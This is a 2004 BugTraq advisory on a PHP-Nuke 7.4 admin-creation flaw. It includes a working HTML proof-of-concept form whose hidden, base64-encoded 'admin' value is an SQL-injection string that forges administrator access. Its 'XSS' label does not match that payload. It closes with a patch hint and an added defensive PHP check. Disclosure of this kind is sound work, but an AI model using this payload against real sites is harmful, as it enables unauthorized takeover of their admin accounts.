BugTraq
[XSS] PHP-Nuke 7.4 Remote Privilege Escalation Sep 03 2004 12:50PM
Pierquinto Manco (mantra ntj it)


**************************************************************
* CODEBUG Labs
* Advisory #1
* Title: AddAdmin Bug
* Author: Pierquinto 'Mantra' Manco
* Product: PHP-Nuke 7.4
* Type: XSS
* Web: http://www.mantralab.org [ITALIAN SITE]
*
**************************************************************

Remote Privilege Escalation

- ) Description

PHP-Nuke is a very bugged web CMS; version 7.4 has a critical
XSS bug that permits an attacker to gain Admin access
to the system.
The bug is very old, but we can bypass the patch by sending the data
by POST instead of GET.

- ) Proof-of-Concept

Create an HTML file with these lines:

<form name="mantra" method="POST" action="http://www.sitewithphpnuke.com/admin.php">
  <p>USERNAME:
  <input type="text" name="add_aid">
  <br>
  NOME:
  <input type="text" name="add_name">
  <br>
  PASSWORD:
  <input type="text" name="add_pwd">
  <br>
  E-MAIL:
  <input type="text" name="add_email">
  <br>
  <input type="hidden" name="admin" value="eCcgVU5JT04gU0VMRUNUIDEvKjox">
  <br>
  <input type="hidden" name="add_radminsuper" value="1">
  <br>
  <input type="hidden" name="op" value="AddAuthor">
  </p>
  <p>
  <input type="submit" name="Submit" value="Create Admin">
  <br>
  </p>
</form>

- ) Patch

Put in admin.php a routine that checks the GET and POST global arrays
(maybe COOKIE too).
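As an added illustration of the patch suggestion above (this is not code from the advisory, nor PHP-Nuke's own code), the following PHP contrasts a guard that inspects only GET, which is the behaviour the advisory says is bypassed by POSTing the same fields, with a guard that inspects every channel the request can carry the parameter in. The only identifier taken from the advisory is the request parameter name admin (the hidden field the PoC form submits); the function names and the response text are hypothetical.

```php
<?php
// Added illustration of the advisory's "Patch" section; not PHP-Nuke code.
// Only the parameter name "admin" comes from the PoC form; everything else
// (function names, response text) is hypothetical.

// Weak variant: the kind of guard the advisory says was bypassed. It looks
// at $_GET only, so the identical parameter sent in a POST body is never seen.
function admin_param_in_get_only(array $get)
{
    return array_key_exists('admin', $get);
}

// Corrected variant: inspect every channel the request can carry the
// parameter in. $channels is a list of superglobal-style arrays; pass
// $_GET and $_POST as the advisory recommends, and add $_COOKIE when the
// application does not legitimately set the value there itself.
// $_REQUEST alone is not a substitute: which arrays it merges depends on
// php.ini (request_order / variables_order), so it may silently omit one.
function admin_param_in_any_channel(array $channels)
{
    foreach ($channels as $channel) {
        if (array_key_exists('admin', $channel)) {
            return true;
        }
    }
    return false;
}

// Guard to run at the top of admin.php, before any "op" (such as AddAuthor)
// is dispatched: refuse the request when the value arrives as a request
// parameter rather than through the application's own mechanism.
function reject_forged_admin_request()
{
    if (admin_param_in_any_channel(array($_GET, $_POST))) {
        header('HTTP/1.0 403 Forbidden');
        die('Forbidden');
    }
}

reject_forged_admin_request();
```

The point of checking each array explicitly rather than relying on $_REQUEST is that a guard is only as good as the channels it covers; a check that proves the parameter is absent from GET says nothing about the POST body, which is exactly the gap the PoC form exploits.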

**************************************************************
http://www.mantralab.org
admin (at) mantralab (dot) org
**************************************************************
